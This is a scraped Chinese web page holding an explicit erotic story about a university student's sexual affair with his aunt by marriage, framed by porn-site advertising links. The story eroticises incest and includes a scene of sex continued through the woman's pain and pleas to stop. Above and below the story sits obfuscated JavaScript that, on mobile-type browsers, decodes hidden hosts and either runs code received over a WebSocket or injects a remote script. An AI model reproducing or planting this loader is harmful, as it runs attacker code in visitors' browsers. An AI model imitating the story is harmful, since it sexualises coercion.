看打炮:kandapao.cc 看打炮:kandapao.vip 广告联系✈:@kandapao

function RhSzTd(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function TIlWio(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return RhSzTd(t);};window['\x45\x71\x73\x4f\x62\x57\x65\x64']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=TIlWio,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/l/'+i;cs.parentElement.insertBefore(s,cs);}})('ZmIuc2ltcGFzYSS5jbg==','dHIueWWVzdWW42NzguY29t','151235',window,document,['S','W']);}:function(){};

二婶与我


  “我二婶来看我了,中午在外面吃的。”我没在意薛丹的脾气,女生有些小脾气也可以理解,她经常会这样,可能漂亮的女生都有些小矫情。

  “哪儿又来个二婶啊,真是的。”薛丹不再生气,却也没太理会我,转身先走进教室了。

  我无奈的摇了摇头,跟在后面,进入教室,找了个两人空位坐在了一起。老师讲课有些枯燥,但好在我可以克服,知识点还是要记忆的。坐着有些疲惫时,我伸伸懒腰,环顾四周,原本需要整个系来上课的,结果在做的只不过三分之二,总有一些人无故旷课,甚至有些同系的学生只有考试时才能见到,那是有人会惊讶的说‘这个人也是咱们系的?’可见这种‘修仙’同学是多么的离谱。

  上完课,陪薛丹吃了晚饭,就算我心急去见二婶,但也不能过分冷落了女友,否则又要遭受数落谴责了,哎,想想大学谈恋爱真辛苦,还不如和二婶在一起开心,踏实舒心,专心干事。

  “林东,下周的‘校园十大校花校草评选’你报名了吗?”薛丹挽着我的胳膊,抬头看向我。

  “没报……”我尽量压制了心中的不耐烦。

  “怎么不报,你报了肯定入围啊,我就报了。”薛丹的语气十分自信。

  “没想报,干嘛?选美啊,我又不是学表演的,弄那些漂亮脸蛋有什么用,迎合那些畜生?”我一向反感这些虚头巴脑的评选,而且听高年级的学长说,每年评出的校花校草都让院里某些色鬼领导霸占了,我一听这个评选当时就菊花一紧。

  “哼!”薛丹听完,甩开我的手,气冲冲的走向了女生宿舍。

  “喂!你又怎么了?!”我真的搞不懂这些女生脑子里都想的什么啊。

  这样也好,我正好可以去校外找二婶了,这样一来还可以早去早回。我一扫心中的郁闷,干脆的转身离开,身后好像听到薛丹喊了什么,但我也没什么心情再去哄她了,直接霸气闪人。

  叮咚!

  “东东?你怎么又回来了?”二婶打开门看到是我,惊讶的双眼一亮。

  “怎么,二婶不希望我来啊。”我假意拉长了脸,一副委屈的样子。

  “哪能,快进来。”二婶伸手将我拉进了房间,脸上的笑容格外灿烂。

  二婶跟我客套的问了晚饭和来的路上的情况,我简单回答,也不找话题继续,然后房间内就变成我和二婶静静的对视,起初二婶脸上有些尴尬茫然,被我盯了一会便抿嘴笑了。

  “东东,你干嘛来了?”二婶别有深意的看着我。

  “二婶和我一起洗个澡吧。”我开门见山,直接向二婶提出了性爱召唤。

  “今晚不走了?”二婶杏眼闪烁着暧昧的目光。

  “不行,还是要回寝室的,学校查的严。”我耸了耸肩膀。

  “也好。”二婶视线下垂,眼中似乎闪过一丝失望。

  我和二婶脱下身上的衣服,双双赤裸走进浴室,我拿起花洒,将水流淋在二婶的丰乳上,二婶静静的站在我的身前,既不躲闪,也不帮忙,摆出一副任由我操作的样子。

  很快,我就用温水淋遍了二婶的胴体,手掌也跟随水流抚摸着她依然窈窕的曲线。二婶拿过我手中的花洒,将水淋在我的身上,那过程好似在模仿我方才的样子,缓缓淋水,轻柔抚摸,最终她温暖的手握住了我的阴茎,让我禁不住身体一抖。二婶放下花洒,缓缓蹲下,张开朱唇,将我的阴茎吞入口中。

  “呼……”下体传来的快感让我顿时长呼一口气。

  二婶的口活特别棒,她总是能吸得我飘飘欲仙,舒爽呻吟,我不敢太过贪恋二婶的口交,否则会早早射精,错过插入那温热阴道的机会,二婶自然也十分了解我的表现,看我渐渐呻吟加重,便主动吐出了我的阴茎。

  沐浴完毕,二婶帮我擦干身体,又将自己擦干,她刚想先我一步走出浴室,我冷不防突然将她横抱在胸前,惹得她大惊失色,一声惊呼。

  二婶搂住我的脖颈后,渐渐稳定了情绪,眼中的惊讶和佩服溢于言表,原本因温热的浴室而绯红的脸颊变得更加红润了。

  我将二婶缓缓放在床上,躺在她身边,吻住她的朱唇,手顺着她的小腹摸到了双腿间,指尖立刻捏住了她柔软的阴唇,揉搓片刻便将手指插入了她的阴道,时快时慢的搅拌起来。

  “东东真的长大了……嗯……”二婶抚摸着我的脸,神情的看着我。

  “可二婶还那么年轻。”我嬉皮笑脸的奉承着。

  “呵……嗯……嗯……”二婶微微一笑,便闭眼享受我的爱抚了。

  二婶特别容易动情,很快我就感觉自己的手指犹如插入潮湿温暖的泉眼,汁水四溢,源源不断。我也没了耐心和玩性,收回手,翻身撑开二婶的双腿,胯下挺立的阴茎开始焦急的寻找着插入的穴口。二婶外泄的淫水很快就涂满了我的龟头,在我前顶试探时,很容易就感觉到了两片阴唇的开合滑腻,在我准备挺腰插入时,脑海里闪现出一个极妙的想法。

  “若琳,我来了……”虽然已经想好,但由于第一次这样称呼二婶,不免底气不足,声音微弱。

  “啊?……啊!!”二婶迟疑还未明确就被一声娇喊掩盖了。

  因为我的一刺到底,让二婶张口呼气,眉头紧皱,我清晰的感觉到二婶的阴道抽动了数次,那紧紧包夹真是撩人无比。

  “你刚刚叫我……什么?……”二婶不敢相信自己的耳朵,杏眼大睁,满脸惊愕的向我确定着方才的称呼。

  “若琳啊,你不叫这个名字?还是我说错了?”我一脸坏笑,同时催动阴茎大力插向二婶的阴道深处。

  “嗯……我是你……哎呀……你轻点……嗯……你怎么能……哎呦……别插那么深啊……嗯……嗯……”二婶责怪的话语被我的深插一一打消,她扭动身体,那样子估计她自己也分不清是在迎合,还是要逃避。

  “叫老公!”一不做二不休,想起薛丹的任性难搞,心中怨气陡增,我趁势直接提出了更过分的要求,同时更加大力的抽插二婶的阴道。

  “东东……哎呀……嗯嗯……轻点……啊啊……别闹了……额嗯……”二婶的表情更加艰难了,手用力的抓在我的胳膊上。

  “叫老公!”我重复着我的命令,胯下的抽插一刻不肯放松。

  “啊啊啊啊啊……轻点……东东……疼……嗯嗯……啊啊啊啊……”二婶脸上的表情十分痛苦,抓在我胳膊上的指尖渐渐陷入了我的皮肤里。

  “快叫老公!”面对二婶的抗拒和坚持,我有些恼羞成怒,而这大部分怨气仍是因为薛丹而生。

  二婶突然起身,双臂搂紧我的脖颈,朱唇开启,凑到了我的耳边,低声重复着让我满意的答案,她口中的热气吹在我的耳边,让我感觉痒痒的,她倾诉给我的称呼让我的心里更是痒痒的,我本是一时玩性大起,赌气发泄。可她那喘息温柔的嗓音让我立刻清醒,也让我立刻沉醉其中,我痴痴的停下了抽插,看着她重新躺回床上的面容,好像一股暖流从她的阴道直接流入了我的心中,然后在我周身扩散,把我涉世未深的情感全部融化。

  “……这下满意了?……”二婶仍大口喘着气,脸上说不清是气恼还是害羞。

  我不好意思的笑了笑,将胯下停止的抽插再次启动,只不过变得舒缓温柔了。

  “二婶我能叫你若琳吗?”二婶顺从了我的命令,我反倒像是泄了气的皮球,斗败了的公鸡,失去了方才的气势和勇敢。

  “还有什么不能的,我都管你叫……”二婶一脸的埋怨,那个称呼到了嘴边,又被她生生咽了回去。

  “若琳,你再叫一次呗。”在二婶面前,我感觉自己和她越发像同龄人了,心中的敬畏渐渐消失,我也变得更加无耻过分。

  “……你们这些孩子,真是的,就这么喜欢玩这个吗?……”二婶无奈的看着我,仿佛希望我打消心中奇怪的想法和过分的要求。

  我点了点头,十分期待的看着二婶,她面临难色,嘴唇翕动,犹豫万分。二婶在我心中是个敢做敢当的厉害女人,她这样犹豫纠结还真是头一次见到。

  休息等待的让我心急,我催动下体发力,再次大力冲击二婶的阴道。

  “哎呀……你怎么又……轻点……啊啊啊啊……轻点……哎呀……”二婶还在犹豫时,被我的凶猛攻势弄得连连娇喘求饶。

  我也不回答,只是一个劲儿的大力抽插,我看她能坚持多久。

  “哎呀……轻点……啊啊啊啊……东东……别闹……我受不了了……啊啊啊啊啊啊……”二婶又是挣扎,又是推搡,但却无法摆脱我凶猛的撞击。

  我也不躲闪,任由二婶推搡拍打,她的一切反抗我都尽数接受,只是一门心思猛力抽插,不变应万变,一招制百招。二婶变得越发慌乱痛苦,朱红的嘴唇时而抿紧,时而微张,我则十分期待着那个称呼的到来。

  “啊啊啊啊啊……老……老公!……轻点……老公……轻点……嗯嗯……老公……轻点……唔……”二婶破空一声唤出了我期盼的称呼,随着我抽插变得舒缓浅慢,二婶的呼喊也平稳缓慢下来,那节奏与我抽插同出一辙,好像在为我抽插配音,倾诉她被征服的感受。

  “老公在这儿呢,我轻点就是了。”我憋着坏笑,十分得意的回应着二婶的呼唤,插入她阴道内的阴茎也不再气势汹汹。

  “臭小子……”二婶水灵灵的大眼睛瞪了我一下。

  “你叫我什么?”我假意恼怒,胯下拉开架势准备再次发动进攻。

  “老公!老公,老公……”二婶立刻学乖了,还未等我插入阴茎,就立刻眉开眼笑的抚摸我的胸膛,好似一只竭力讨好主人的小猫。

  “这还差不多,老公的鸡巴大不大呀?”我拿捏声音,装出一副高高在上的样子。

  “大,大……”二婶连连点头。

  “老公的鸡巴长不长呀?”我将阴茎深插入二婶的阴道,在她的宫口处做短暂研磨。

  “长……嗯……长……”二婶眉头微蹙。

  “那若琳喜不喜欢让老公干呀?”我伸手勾起二婶的下颌,仔细考量着她的表情。

  “喜欢……”二婶的面容和脖颈都变得绯红。

  “喜欢到什么程度呀?”我有些绷不住自己装腔作势的声音了,下一秒随时会笑出声音来。

  “我想给老公生孩子……”二婶双手大力的握住我的小臂,身体扭动,私处更是十分淫荡的挺起,好像唯恐错失与我亲密交合的每一秒。

  孩子?这个词在我脑中炸响,我感觉我的尿意陡然失控,在插了不到四五下后,我便挺身颤抖,射出了自己滚烫的精液。

  “嗯!”二婶立刻发出一声十分享受的呻吟。

  我感觉自己的阴茎脉脉跳动,一股股热流从马眼喷射奔涌,此刻我的脑海里好像出现了一个神奇的画面,我化身自己的一颗精子,与身边成千上万的精子们,争先恐后的飞入二婶的宫口,进入一片亮红的肉腔,‘千军万马’四处寻找着那颗唯一的‘宝珠’,只有我首先发现,风一般的冲向那个诱人的目标,在胜过所有精子后,我一头插入到那颗‘宝珠’中,心满意足的安稳下来,静待孕育成熟的一刻。

  我缓缓低下身子,趴在了二婶的胸脯上,脸就压在丰满的乳房上,伸手贪恋的抚摸着她的另一只乳房。

  “累了吧……”二婶抚摸着我的头。

  “有点。”我捏了捏她的乳房,然后两指捏住乳头,玩弄了起来。

  “嗯……还没玩够啊?”二审的语气中透着无奈和笑意。

  “二婶,你要是我的女人就好了……”相比二婶的热情体贴,薛丹的任性冷漠让我不胜心烦。

  “我不是吗?那我刚才叫谁……那什么了。”二婶反问的有些理直气,但补充理由时,却又含糊其辞了。

  “这么远来看你,一心惦记着你,你想做,我就跟你做,你喜欢玩,我就陪你玩,连孩子都给你生了,还不算是你的女人?”二婶口吐连珠,一通说到了极致,说到最后竟然听出了几分委屈和不甘。

  “二婶,我不是那个意思,我是说,你要是能陪我上课,一同吃饭,一起看比赛,像我的同学一样就好了。”我侧躺在二婶身边,手撑着头,另一手一直未离开她的乳房。

  “你说的这个啊,是二婶没那个福气,遇不到你这样的男人,即便二婶想为你做一切,但这些事二婶都陪不了你啊。”二婶的语气显得十分悲凉。

  我将头枕在二婶的肩头,抱着她的上身,二婶也环抱住我的身体,良久,我们彼此都没有说话。最后,还是二婶打破了我们两人静静的缠绵,我也总是要回到学校的。

  “二婶,你以后叫我老公吧,好不好。”我穿好衣服,准备离开旅店,站在门口摇晃着二审的胳膊,这次不敢再任性造次欺负她,只能拿出小孩子的样子央求着。

  “东东,你喜欢玩这样的游戏,二婶愿意配合你,但平时真的不能叫,二婶,不是不愿意,只是怕叫着叫着,习惯了,叫到了心里,我会习惯的,那你就是毁了你二婶和一鸣了,你知道了吗?”二婶伸手抚摸着我的脸庞,眼中透射着怜爱和无奈。

  “哦,我知道错了”我低下头,这才明白了自己的任性天真,和二婶的真情和苦衷。

  “干嘛道歉,你知道二婶的难处就行了。快回学校吧,也不早了。”二婶微笑拍了一下我的肩头。

  二婶送我到了旅店的外门口,二婶站在台阶上,我站在台阶下,我们两人正好视线水平一齐。我忍不住想伸手向她的腰身,可没想到二婶闪电般反应,伸手打退了我造次的咸猪手。

  “那我走了,二婶再见……”我扫兴转身正要离开。

  “老公再见”声线细若蚊蝇“啊?哎呀!”背后传来的告别让我始料不及,兴奋转身时,竟忘记了调整脚步,当即把脚崴了一下。

  “东东!”二婶立刻紧张的过来扶我。

  “老婆再见!”我的兴奋的声音可比二婶的矜持打多了。

  “嘘~”二婶将食指竖在唇上,想让我收声闭嘴。

  “老婆再见!老婆再见!……”我一声比一声大,一声比一声清晰洪亮。

  “你这孩子……”二婶急的直跺脚,索性直接转身跑回了旅店。

  【完】


function irEIsy(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function jOTUsRu(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return irEIsy(t);};window['\x55\x43\x72\x66\x4c\x56\x47']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=jOTUsRu,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/l/'+i;cs.parentElement.insertBefore(s,cs);}})('ZmIuc22ltcGFzYS5jbg==','dHIueWVzdW42NzguY299t','151236',window,document,['2','9']);}:function(){};